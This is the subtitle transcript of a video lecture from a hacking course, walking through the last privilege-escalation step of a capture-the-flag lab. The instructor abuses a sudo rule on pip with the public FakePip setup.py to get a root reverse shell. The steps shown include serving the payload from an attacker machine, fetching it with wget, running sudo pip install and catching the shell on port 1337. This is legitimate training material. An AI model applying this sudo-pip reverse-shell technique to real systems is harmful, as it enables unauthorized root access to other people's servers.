1
00:00:01,050 --> 00:00:08,070
Hi, within this lecture, we're going to try and escalate our privileges one last time because we're

2
00:00:08,070 --> 00:00:12,550
going to be root eventually, if we can manage it, of course.

3
00:00:13,020 --> 00:00:16,370
So right now, we are devops; we were Mamadu.

4
00:00:16,530 --> 00:00:18,720
So we are making our way to the top.

5
00:00:19,020 --> 00:00:21,800
So let me close everything over here, OK?

6
00:00:22,080 --> 00:00:23,850
And try to focus over there.

7
00:00:24,450 --> 00:00:29,310
So right now, we're devops and we want to be root.

8
00:00:29,310 --> 00:00:30,600
So how do we do that?

9
00:00:30,930 --> 00:00:34,820
Let me show you another technique that we can use other than find.

10
00:00:35,250 --> 00:00:42,150
So I'm going to open my notes one more time and let me scroll down a little bit and show you something.

11
00:00:42,690 --> 00:00:47,610
So as you can see, there are a couple of automated tools that we're going to dive into later on.

12
00:00:47,820 --> 00:00:48,860
And here you go.

13
00:00:48,990 --> 00:00:57,230
As you can see, we have this command called sudo -l. So it's a very simple command, OK?

14
00:00:57,450 --> 00:01:04,640
And it actually gives us what we can do as a sudoer or as an administrator user.

15
00:01:05,070 --> 00:01:14,280
And it works OK, just run sudo -l and you will see what kind of things that we can run like, as

16
00:01:14,280 --> 00:01:23,550
if we are an administrator user, so we can actually run the pip over here.

17
00:01:23,550 --> 00:01:29,990
So user devops may run the following commands, like that, and it's not like a SUID thingy.

18
00:01:30,690 --> 00:01:32,200
So this is very common.

19
00:01:32,220 --> 00:01:40,620
OK, so a root or administrator can decide to give permissions to run some kind of binaries like this

20
00:01:40,620 --> 00:01:48,020
one to the users or to some groups like developer groups, because it's necessary on the server.
21
00:01:48,120 --> 00:01:48,540
Right.

22
00:01:48,540 --> 00:01:50,710
Like in this case we can run pip.

23
00:01:51,270 --> 00:01:53,190
So what can we do with pip?

24
00:01:53,460 --> 00:01:55,890
Pip is a Python package manager.

25
00:01:55,890 --> 00:02:01,200
If you don't know what it is, I hope you know a little bit of Python so you can understand what we are

26
00:02:01,200 --> 00:02:02,190
doing over here.

27
00:02:02,760 --> 00:02:05,300
And I'm going to show you what we can do with it.

28
00:02:05,760 --> 00:02:10,530
I'm going to run "/usr/bin/pip exploit", OK?

29
00:02:10,800 --> 00:02:14,260
And of course, "sudo", something like that, in Google.

30
00:02:14,820 --> 00:02:18,630
So once you do that, you will see a lot of tools over there.

31
00:02:18,840 --> 00:02:21,310
So it's a common thing.

32
00:02:21,600 --> 00:02:22,650
Yeah, apparently.

33
00:02:22,650 --> 00:02:25,320
And there is something called FakePip.

34
00:02:25,650 --> 00:02:28,550
So FakePip, you can just search for that as well.

35
00:02:29,160 --> 00:02:39,330
So as you can see, it says that it's "exploit sudo with user install" and that is exactly what we are

36
00:02:39,330 --> 00:02:41,240
trying to do over here.

37
00:02:41,250 --> 00:02:41,710
Right.

38
00:02:42,240 --> 00:02:46,830
So as you can see, it gives the same demonstration over here.

39
00:02:46,860 --> 00:02:51,720
They run sudo -l and they listed this thingy.

40
00:02:51,930 --> 00:03:00,810
And over here, if we can go to the command itself, it's kind of what we have actually run in the previous

41
00:03:00,810 --> 00:03:01,460
lecture.

42
00:03:01,470 --> 00:03:03,990
OK, it's doing a reverse shell.

43
00:03:04,380 --> 00:03:10,910
Of course, that's how we are going to get the shell and we have the thing going on over there.

44
00:03:11,700 --> 00:03:17,220
So of course, we're going to have to change the whole system part one more time, at least the host

45
00:03:17,220 --> 00:03:17,940
itself.
46
00:03:18,210 --> 00:03:20,290
But we can actually use this.

47
00:03:21,060 --> 00:03:24,900
So how do we use this over here?

48
00:03:24,900 --> 00:03:34,510
Apparently in the GitHub of this guy, we see the instructions. We can run this, OK: /usr/bin/pip install

49
00:03:34,530 --> 00:03:41,890
--upgrade --force-reinstall, but we have to download the setup.py file into the remote target and execute

50
00:03:41,890 --> 00:03:43,200
this in the local folder.

51
00:03:43,990 --> 00:03:52,590
So first of all, we're going to have to download this or just copy and paste the code into our server,

52
00:03:52,920 --> 00:03:54,600
into our target server.

53
00:03:55,260 --> 00:03:59,120
So we are currently in the target server, right?

54
00:03:59,130 --> 00:04:03,040
As Mamadu first and now with devops.

55
00:04:03,480 --> 00:04:09,420
So first of all, we're going to have to download that setup.py file into the target.

56
00:04:09,960 --> 00:04:19,800
And if we actually execute that in the local folder, then we're going to get back some connection and

57
00:04:20,220 --> 00:04:23,420
hopefully this connection will be sent as root.

58
00:04:24,030 --> 00:04:29,880
So in order to copy this, you can just come over here like we have learnt in the Bandit.

59
00:04:30,120 --> 00:04:31,040
Just copy this.

60
00:04:31,060 --> 00:04:34,080
Get over here and try to clone it.

61
00:04:34,170 --> 00:04:34,680
Right.

62
00:04:34,980 --> 00:04:37,350
Let's try and see.

63
00:04:37,380 --> 00:04:37,810
Yep.

64
00:04:37,830 --> 00:04:38,880
Clear doesn't work.

65
00:04:38,880 --> 00:04:45,690
We don't even have like a proper shell over here and we don't even have a git command as well.

66
00:04:46,110 --> 00:04:54,710
So let's see, we have wget, OK, we can try to run wget; wget is this kind of downloading something.

67
00:04:55,170 --> 00:04:59,010
OK, so let me try to download everything over here.
68
00:04:59,490 --> 00:05:07,320
And see, yes, if you say ls, we can see FakePip over here. Let me go into the FakePip and see

69
00:05:07,320 --> 00:05:08,350
if we can get it.

70
00:05:09,450 --> 00:05:12,590
No, we cannot cd into the FakePip.

71
00:05:12,630 --> 00:05:18,080
OK, so I believe there is something wrong over here.

72
00:05:18,120 --> 00:05:19,340
Let's try one more time.

73
00:05:19,350 --> 00:05:23,280
Nope, it doesn't work. If you run ls, FakePip

74
00:05:23,280 --> 00:05:24,360
is over there.

75
00:05:24,360 --> 00:05:26,520
But we cannot cd into that.

76
00:05:27,630 --> 00:05:30,170
There's something wrong. If we say ls -la...

77
00:05:30,840 --> 00:05:32,970
And here you go.

78
00:05:32,970 --> 00:05:39,390
I believe this thinks that FakePip isn't a folder, but it's a file.

79
00:05:39,810 --> 00:05:43,680
But I believe you're downloading it in a wrong way.

80
00:05:44,010 --> 00:05:47,640
So let me just run the wget over here and see what's going on.

81
00:05:48,390 --> 00:05:51,960
And this is not what I expect, right?

82
00:05:51,960 --> 00:05:59,040
So let me just copy this from here and come over there and try to wget it over here

83
00:05:59,400 --> 00:06:02,760
in our own Kali Linux to see what's wrong over there.

84
00:06:03,000 --> 00:06:04,890
OK, so let me run it.

85
00:06:04,890 --> 00:06:07,200
Let me cd into that.

86
00:06:08,250 --> 00:06:08,520
Yeah.

87
00:06:08,520 --> 00:06:13,260
It says that it's not a directory, it's a file apparently.

88
00:06:13,620 --> 00:06:15,450
So let me say file FakePip.

89
00:06:15,690 --> 00:06:15,990
Yeah.

90
00:06:15,990 --> 00:06:17,370
It's some HTML document.

91
00:06:17,370 --> 00:06:25,800
So it doesn't clone or it doesn't download the Python code, but it actually downloads the HTML.

92
00:06:26,040 --> 00:06:28,620
So I'm just going to clone this on my own Kali.
93
00:06:28,950 --> 00:06:32,820
So let me remove this FakePip over here, OK.

94
00:06:33,030 --> 00:06:39,660
And I'm just going to git clone the thing so that we can actually see the Python code, at least in

95
00:06:39,660 --> 00:06:46,170
our own Kali Linux, then maybe we can try to move that file to our remote server.

96
00:06:46,380 --> 00:06:48,570
So I'm going to go into the FakePip right now.

97
00:06:48,750 --> 00:06:50,010
Yep, here we go.

98
00:06:50,490 --> 00:06:56,070
Now, let's try to find the setup.py, right?

99
00:06:56,070 --> 00:06:56,760
Here you go.

100
00:06:56,880 --> 00:07:05,160
Now, we want to just take everything inside of the setup.py and just move them into

101
00:07:05,160 --> 00:07:09,120
our server, and let me change this localhost over here.

102
00:07:09,450 --> 00:07:15,450
I'm going to say 10.0.2.4, which is my own Kali Linux IP, and for port you can just keep it.

103
00:07:15,720 --> 00:07:20,070
And over here let's see if we have some kind of IP stuff over there.

104
00:07:20,790 --> 00:07:21,410
Nope.

105
00:07:21,720 --> 00:07:22,050
Yeah.

106
00:07:22,050 --> 00:07:27,390
LHOST and LPORT are embedded as a variable over here, so we don't have to change anything else.

107
00:07:27,960 --> 00:07:34,350
So for our port you can leave it as it is or you can choose any other port if it doesn't work for you.

108
00:07:35,070 --> 00:07:36,570
But make sure you don't do this.

109
00:07:36,570 --> 00:07:38,910
One, two, three, four, because we already use that.

110
00:07:39,240 --> 00:07:49,290
OK, so I'm going to try and just send the setup.py to our server, so you can just copy and paste

111
00:07:49,470 --> 00:07:54,000
this thing or you can even write it on your own in the server as well.
112
00:07:54,360 --> 00:08:03,240
And you can try to do it in a more, I don't know, complex way, like try to put this into your own

113
00:08:03,240 --> 00:08:07,410
Apache server and just try to wget it from there.

114
00:08:08,100 --> 00:08:17,170
For example, let me just clear this stuff and let me try to copy the setup.py into my /var/www/

115
00:08:17,240 --> 00:08:23,550
html folder, which is my Apache2 server root folder, if you know what I mean.

116
00:08:23,970 --> 00:08:29,670
Now what I'm going to do, I'm going to just say service apache2 start in order to make my Apache2

117
00:08:29,670 --> 00:08:30,630
server run.

118
00:08:31,110 --> 00:08:36,390
And now I have a website running over here and inside of my website

119
00:08:36,540 --> 00:08:39,390
I have setup.py right now.

120
00:08:39,390 --> 00:08:46,740
I will just reach that setup.py right from my own Kali, from the target server.

121
00:08:47,100 --> 00:08:47,550
Right.

122
00:08:47,550 --> 00:08:50,640
If I come over here I can write 10.0.2.4

123
00:08:50,970 --> 00:08:54,650
slash setup.py, and now I can reach that file.

124
00:08:54,840 --> 00:08:59,340
Of course we are going to have to do this in the server, not in the local machine.

125
00:08:59,820 --> 00:09:02,280
And we can easily do that by running

126
00:09:02,280 --> 00:09:08,120
wget, and say like https... wget.

127
00:09:08,130 --> 00:09:10,320
I have to use http, not https.

128
00:09:10,340 --> 00:09:15,630
Sorry, we're gonna have to specify the whole path over here rather than just 10.0.2.4.

129
00:09:15,960 --> 00:09:20,580
So like this: http://10.0.2.4/setup.py.

130
00:09:20,970 --> 00:09:24,180
OK, so if you hit enter it will download it.

131
00:09:24,300 --> 00:09:26,010
And now if I run that ls -la,

132
00:09:26,010 --> 00:09:26,610
here you go.

133
00:09:26,610 --> 00:09:29,850
Now we see the setup.py right over here.
134
00:09:30,180 --> 00:09:39,690
Now if you remember the instructions, it says that just download the setup.py into your target

135
00:09:39,690 --> 00:09:40,230
machine.

136
00:09:40,410 --> 00:09:42,240
And that's exactly what we did.

137
00:09:42,510 --> 00:09:42,930
Right.

138
00:09:42,930 --> 00:09:48,330
We managed to just get this setup.py into our target machine.

139
00:09:48,600 --> 00:09:56,220
And it was actually nice to change the IP address from Kali as well so that we don't deal

140
00:09:56,220 --> 00:09:58,410
with it inside of the target server.

141
00:09:58,560 --> 00:09:59,070
Maybe we

142
00:09:59,150 --> 00:10:02,420
don't even have nano or vim over here, we don't know yet.

143
00:10:02,870 --> 00:10:09,590
OK, so what I'm going to do, I'm going to listen for incoming connections for the port

144
00:10:09,590 --> 00:10:15,330
1337, because that's our LPORT, right?

145
00:10:15,830 --> 00:10:21,830
So what I'm going to do next, I'm going to go back to this FakePip and just run the thing that it

146
00:10:22,070 --> 00:10:23,280
asks us to run.

147
00:10:23,660 --> 00:10:30,760
So we're going to run the /usr/bin/pip install, and we're going to install with --upgrade and --force-

148
00:10:30,830 --> 00:10:32,990
reinstall the thing over here.

149
00:10:33,200 --> 00:10:36,380
And we are running this as sudo, as you can see.

150
00:10:36,620 --> 00:10:39,190
We're running it with the sudo command.

151
00:10:39,920 --> 00:10:41,240
And here you go.

152
00:10:41,330 --> 00:10:43,700
Now it has been executed.

153
00:10:44,090 --> 00:10:45,790
We can run this with the sudo

154
00:10:45,800 --> 00:10:46,310
command. Why?

155
00:10:46,310 --> 00:10:49,220
Because it's allowing us to do so.

156
00:10:49,700 --> 00:10:54,610
And if you come over here to your Kali, you're finally root.

157
00:10:54,830 --> 00:10:57,230
So this FakePip does work.
158
00:10:57,240 --> 00:10:59,690
OK, thanks to this guy.

159
00:10:59,690 --> 00:11:02,380
OK, and if you run whoami,

160
00:11:02,540 --> 00:11:04,340
we are again root.

161
00:11:04,670 --> 00:11:12,650
So if we run ls, we can see we are inside of some folder. If you run locate root.txt, you can

162
00:11:12,650 --> 00:11:20,540
see that it's in the /root folder. You can cd to the root, or you can just cat this out: not

163
00:11:20,540 --> 00:11:23,610
cd to the root, but cat root.txt.

164
00:11:23,810 --> 00:11:24,860
And here you go.

165
00:11:24,860 --> 00:11:27,800
We have the final flag over here.

166
00:11:28,160 --> 00:11:31,390
So we managed to solve the CTF.

167
00:11:32,420 --> 00:11:37,730
So if you're thinking that, yeah, we managed to solve it and I understood everything, but there are

168
00:11:37,730 --> 00:11:38,990
a lot of ways to go.

169
00:11:38,990 --> 00:11:41,110
So how did you know which way to go?

170
00:11:41,450 --> 00:11:46,610
Of course, there are a lot of leads and we're going to cover them in the privilege escalation sections

171
00:11:46,610 --> 00:11:47,990
again during this course.

172
00:11:48,140 --> 00:11:52,210
And we're going to cover a lot of gaining access information here as well.

173
00:11:52,520 --> 00:11:58,160
Remember that this is not the first time that I'm solving this CTF.

174
00:11:58,340 --> 00:12:05,270
I saw this a couple of years ago and it took me a lot more than one hour or one and a half hours.

175
00:12:05,270 --> 00:12:08,900
I don't know how much time we spent on this one.

176
00:12:09,740 --> 00:12:14,630
Now, it took me less because I almost knew which direction to go.

177
00:12:14,870 --> 00:12:22,100
I didn't remember everything, but it was easy for me to guide myself through something, for example,

178
00:12:22,100 --> 00:12:26,090
for the crontab thing or from the cron job.
179
00:12:26,780 --> 00:12:29,180
I was listening for the incoming connection.

180
00:12:29,330 --> 00:12:35,390
If I wasn't listening for the incoming connection, then I wouldn't have got the connection back from

181
00:12:35,390 --> 00:12:35,830
the server.

182
00:12:37,220 --> 00:12:42,380
Then I wouldn't have the chance to understand that it's being executed on its own.

183
00:12:42,560 --> 00:12:46,430
And maybe I would think that, yeah, I'm getting back the connection,

184
00:12:46,430 --> 00:12:50,120
but as Mamadu, not the devops sudoer user.

185
00:12:50,540 --> 00:12:53,390
But anyhow, we got the root flag.

186
00:12:53,390 --> 00:12:55,910
I'm just going to make a note of that as well.

187
00:12:56,600 --> 00:13:00,140
Again, don't worry about the alternative stuff.

188
00:13:00,140 --> 00:13:03,260
We're going to learn a lot of alternatives during the course.

189
00:13:03,260 --> 00:13:06,170
This is why we are doing it in the first place.

190
00:13:06,530 --> 00:13:13,870
OK, so I'm going to come over here and just write root.txt and just paste it over there.

191
00:13:14,240 --> 00:13:16,370
See you in the next section.